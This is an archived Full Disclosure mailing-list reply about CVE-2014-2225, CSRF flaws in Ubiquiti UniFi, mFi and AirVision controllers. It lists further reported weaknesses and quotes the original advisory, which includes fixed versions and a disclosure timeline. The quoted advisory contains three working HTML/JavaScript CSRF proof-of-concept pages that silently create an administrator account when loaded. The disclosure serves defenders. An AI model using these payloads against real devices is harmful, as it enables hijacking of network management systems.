Full Disclosure mailing list archives
Re: CVE-2014-2225: Ubiquiti Networks - Multiple products - Cross-site Request Forgery (CSRF)
From: Luca Carettoni <luca.carettoni () ikkisoft com>
Date: Thu, 24 Jul 2014 13:59:22 -0700
This is interesting. Ubiquiti knew about this issue since last year. On 26 Sep 2013, I reported to them the following vulnerabilities affecting UniFi Controller: http://www.ikkisoft.com/stuff/UnifiSecurityBugs_Sep2013.pdf #1 Insecure Java Random() to generate secret tokens This was fixed in 3.1.5 as "security enhancements". See http://pastebin.com/Xt0hVCPr for the change log. java.util.Random was used across the entire codebase to generate secret tokens, such as session cookies, AP auth keys and reset tokens. Under some circumstances, it was practical to predict the reset password token and compromise the admin account, which would lead to full compromise of the entire platform. #2 System-wise Cross Site Request Forgery In addition to the pdf detailing the vulns, I've shared with them a PoC with the exact same attack. After a few emails, trying to explain the criticality of CSRF in this context, I simply gave up. #3 Change password does not require old password #4 Frameable response (ClickJacking) #5 Credentials are saved in plain-text within MongoDB #6 Multiple Cross-Site Scripting vulnerabilities (Stored and Reflected) in /api/, abusing IE content sniffing As far as I know, these are still open. In addition, I've asked them to obtain CVEs for those vulnerabilities. On Oct 30th, they confirmed that they would be disclosed to be public: "Good point about CVE, we'll request an ID and disclose them later. Will also address V2." I don't think that CVEs have ever been assigned to these issues, neither Ubiquiti has published those details in a security advisory. Cheers! @_ikki On Wed, Jul 23, 2014 at 8:58 PM, Seth Art <sethsec () gmail com> wrote:
----------- Vendor: ----------- Ubiquiti Networks (http://www.ubnt.com/) ----------------------------------------- Affected Products/Versions: ----------------------------------------- UniFi Controller v2.4.6 mFi Controller v2.0.15 AirVision Controller v2.1.3 Note: Previous versions may be affected ----------------- Description: ----------------- Title: Cross-site Request Forgery (CSRF) CVE: CVE-2014-2225 CWE: http://cwe.mitre.org/data/definitions/352.html Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html Researcher: Seth Art - @sethsec --------------- UniFi POC: --------------- <html> <head> <script> function sendCSRF() { var url_base = "https://192.168.0.106:8443/api/add/admin" var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D" var xmlhttp; xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", url_base, true); xmlhttp.setRequestHeader("Accept","*/*"); xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded; charset=UTF-8"); xmlhttp.withCredentials= "true"; xmlhttp.send(post_data); } </script> </head> <body> <h1>CSRF POC</h1> Sending CSRF Payload!!! <body onload="sendCSRF()"> </body> ------------- mFi POC: ------------- <html> <head> <script> function sendCSRF() { var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin" var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D" var xmlhttp; xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", url_base, true); xmlhttp.setRequestHeader("Accept","*/*"); xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded; charset=UTF-8"); xmlhttp.withCredentials= "true"; xmlhttp.send(post_data); } </script> </head> <body> <h1>CSRF POC</h1> Sending CSRF Payload!!! <body onload="sendCSRF()"> </body> -------------------- AirVision POC: -------------------- <html> <head> <script> function sendCSRF() { var url_base = "https://192.168.0.106:7443/api/v2.0/admin" var post_data="{\”name\”:\”csrf\”,\”email\”:\”csrf () gmail com\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}” var xmlhttp; xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", url_base, true); xmlhttp.setRequestHeader("Accept","*/*"); xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8"); xmlhttp.withCredentials= "true"; xmlhttp.send(post_data); } </script> </head> <body> <h1>CSRF POC</h1> Sending CSRF Payload!!! <body onload="sendCSRF()"> </body> ------------- Solution: ------------- UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater mFi Controller - Upgrade to mFi Controller v2.0.24 or greater AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note: The application name changed from AirVision to UniFi Video) ----------------------------- Disclosure Timeline: ----------------------------- 2014-02-16: Notified Ubiquiti of vulnerabilities in UniFi and mFi products 2014-02-17: Ubiquiti acknowledges and requests details 2014-02-17: Report with POC sent to Ubiquiti 2014-02-19: Asked Ubiquiti to confirm receipt of report 2014-02-19: Ubiquti confirms receipt of report and existence of the vulnerabilities 2014-02-25: Notified Ubiquiti of CSRF vulnerability in AirVision product 2014-02-19: Ubiquti confirms receipt of AirVision report and existence of the vulnerability 2014-02-28: CVE-2014-2225 assigned 2014-03-12: Requested status update 2014-03-27: Requested status update 2014-04-07: Requested status update, mention that we might need to bring in a CERT 2014-04-09: Ubiquiti provides timeline for solution 2014-04-18: UniFi Video 3.0.1 is released 2014-05-30: Requested a status update on the remaining two products 2014-06-12: Requested a status update on the remaining two products 2014-06-12: mFi v2.0.24 and UniFi 3.2.1 are released 2014-06-13: Set public disclosure date of 2014-07-24 and notified vendor 2014-07-24: Public disclosure
_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- CVE-2014-2225: Ubiquiti Networks - Multiple products - Cross-site Request Forgery (CSRF) Seth Art (Jul 24)
- Re: CVE-2014-2225: Ubiquiti Networks - Multiple products - Cross-site Request Forgery (CSRF) Luca Carettoni (Jul 24)